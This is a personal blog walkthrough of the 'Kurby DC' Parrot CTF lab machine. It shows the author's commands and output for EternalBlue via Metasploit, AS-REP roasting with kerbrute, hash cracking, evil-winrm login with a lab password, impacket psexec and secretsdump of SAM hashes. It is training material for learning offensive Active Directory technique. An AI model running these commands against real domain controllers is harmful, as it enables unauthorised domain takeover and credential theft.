Kurby DC parrot CTF Walkthrogh

Musyoka Ian
7 min readJul 15, 2024

--

Hello guys welcome back to another walkthrought this time we are going to be tackling kurby DC from parrot CTF. I can rate the box as an easy machine since we only exploit one bug to get domain administrator on the box. The vulnerability being eternablue. We’ll start off by running a nmap scan on the box and discover it is a domain controller. The SMB server leaks the version of the server that’s running. Looking online we discover that it should be vulnerable to eternal blue vulnerability. We use metasploit to exploit the vulnerability to get domain admin on the box. Afterwards we discover that it was a unintended path we get the user called kurby from our previous exploit and discover the user does not require kerberos pre authentication we exploit the vulnerability to get a timestamp which we can crack and get the user’s password. WE then use the credentials to login in to the server using windows remoting and discover the user is an administrative user. This allows us to utilize psexec by impacket to get an domain admin shell. Without much say let’s jump in

As always we’ll start of by an nmap scan of the box and we discover some few ports are open. The command we ran was

nmap -sC -sV -oA nmap/kurby -Pn 10.14.3.242

The results are as seen below

cat nmap/kurby.nmap                                                                                                                                                                                                                       ✔  at 08:06:17 PM  
# Nmap 7.94SVN scan initiated Mon Jul 15 19:33:51 2024 as: nmap -sC -sV -oA nmap/kurby -Pn 10.14.3.242
Nmap scan report for 10.14.3.242
Host is up (0.23s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-13 10:30:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kurby.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: KURBY)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kurby.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: WIN-0S9I9H1N8LS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: WIN-0S9I9H1N8LS
| NetBIOS computer name: WIN-0S9I9H1N8LS\x00
| Domain name: kurby.local
| Forest name: kurby.local
| FQDN: WIN-0S9I9H1N8LS.kurby.local
|_ System time: 2024-07-13T03:30:32-07:00
|_nbstat: NetBIOS name: WIN-0S9I9H1N8LS, NetBIOS user: <unknown>, NetBIOS MAC: 00:ff:6c:bd:f2:17 (unknown)
| smb2-time:
| date: 2024-07-13T10:30:32
|_ start_date: 2024-07-13T08:51:14
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -2d03h44m21s, deviation: 4h02m29s, median: -2d06h04m22s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 15 19:35:10 2024 -- 1 IP address (1 host up) scanned in 79.08 seconds

psexec.py kurby.local/kurby@10.14.3.242Looking at script scan for SMB we notice that the version of smb is leaked

Googling we get the server might be vulnerable to eternalblue

The following article is a nice read

https://gist.github.com/05t3/7d5925e6a4585abe2a48cc4a978aea87

To exploit the vulnerability we’ll use metasploit framework which comes preinstalled in kali Linux

I opened up the framework using the command

msfconsole

Then i search for eternalblue module and a few results came up. i uused the module

exploit/windows/smb/ms17_010_psexec

Then next i configured the lhost and rhost which are attackers and victims IP Addresses respectively

Next i ran the exploit and as seen below we get a meterpreter shell

This allows us to get both user and root.txt

But looking back at the platform we notice that maybe this was unintended ?????

I took the name kurby which was from the user’s directory and saved it in a file callled users. Then ran user enumeration using kerbrute. The command used was

kerbrute userenum --dc 10.14.3.242 -d kurby.local users 
kerbrute userenum --dc 10.14.3.242 -d kurby.local users                                                                                                                                                                              

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 07/15/24 - Ronnie Flathers @ropnop

2024/07/15 20:22:29 > Using KDC(s):
2024/07/15 20:22:29 > 10.14.3.242:88

2024/07/15 20:22:29 > [+] kurby has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$kurby@KURBY.LOCAL:5e9ddaa4fde77be1f665e49fdde583a8$32b33463fa7630a73f141f43543c4405b636634390981ba43ff515b7ddb6ff6ff9fac64db4e5f3910017c4b75677a0f8d3ee936014957decc49def87654fb691a3bf3a8c58f575a8586f319f48a077cb00ba18fefd0a5251fe51d4b1e2f606ae4e34b23a218e44260dde8622e97787446304616fb5ac6ebb4d3f02953e6f5cb659ea3d5957395001f6c82ee748a6d41de343dd7aaf517b760374e3b4949af2f27d38ebcb9b53370d242c8af216a63981e4101d8e22a9a6634b65cf48502355c5c200afea9269e3b19b3c1e1507999453b3bac64f649129cad433861b2210e5058a5b8753fbbe1a481ebb78ead830f778837f42d939fbffd51d4ce013ee38
2024/07/15 20:22:29 > [+] VALID USERNAME: kurby@kurby.local
2024/07/15 20:22:29 > Done! Tested 1 usernames (1 valid) in 0.266 seconds

We get a asreproast hash from the user as seen above which i then saved it to a file

On trying to crack using john the ripper fails. Looking at the hash it’s encryption type 18. I decided to downgrade the hash to type 23 and kerbrute can do this perfectly by including a — downgrade flag to the command.

The command will now become

kerbrute userenum --dc 10.14.3.242 -d kurby.local users --downgrade
kerbrute userenum --dc 10.14.3.242 -d kurby.local users --downgrade                                                                                                                                                                       ✔  at 08:22:29 PM  

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 07/15/24 - Ronnie Flathers @ropnop

2024/07/15 20:27:53 > Using downgraded encryption: arcfour-hmac-md5
2024/07/15 20:27:53 > Using KDC(s):
2024/07/15 20:27:53 > 10.14.3.242:88

2024/07/15 20:27:54 > [+] kurby has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$kurby@KURBY.LOCAL:b82ef4534e1240dd8bf1a13f05db19db$6b0895b7c84311a9f3ba4c225cb437da23a8bd00fa9edc37227523c961e6cc966dea71ee0954e112e9fa3df0328205f55cf90cb577ebd26604ff9907169a34549732563329b8b26a2f4d7f202043f67948ad82a4d4f3d6e64e67fc05022725781c92ed64b3fc9e471d0cb52e4b07afbf82aa2bbb15687dc86032d76bd1d91ae25c79a5e548c93fd3f28f532f450c9c608cc4a0c4b43e4cf874c9c87f2d8787971d70417427c6735956ba22e9e42e4e7376644680ac7005e30f40ba62f7d5404d4806da16d818038d82f83a1613a8deb031b823a0b7aff2f65604b8a1a7b731b0d7819fc80810a94d802e
2024/07/15 20:27:54 > [+] VALID USERNAME: kurby@kurby.local
2024/07/15 20:27:54 > Done! Tested 1 usernames (1 valid) in 0.247 seconds

We get another hash and on trying to crack the hash again this time it cracks perfectly and we have the password for the user Kurby. The attack we’ve exploited is called asrep roasting attack in active directory

Using the credentials we can login to the server using windows remoting. which is a service that primarily runs on port 5985 and 5986.

The tool we’ll utilize is called evil-winrm that also comes preinstalled in kali linux and the command we’ll run is

evil-winrm -i 10.14.3.242 -u kurby -p "alice@15"

running whoami /all we see we have administrative privileges on the server

I used impacket’s psexec to get a system shell on the server. The command used was

 psexec.py kurby.local/kurby@10.14.3.242

Lastly we can extract the user’s hashes using secrets dump and the command

secretsdump.py kurby.local/kurby@10.14.3.242
secretsdump.py kurby.local/kurby@10.14.3.242                                                                                                                                                                                 ✔  impacket   at 08:52:28 PM  
Impacket v0.12.0.dev1+20240711.104209.512a1db5 - Copyright 2023 Fortra

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x581833951da909c660aebc587055fc7b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5faff1097a20866b6ca2e585e175c44a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

And the box is pretty much done. I hope you enjoyed the walkthrough if so clap for me down bellow and follow me so that you wont miss any upcoming wallkthoughs

--

--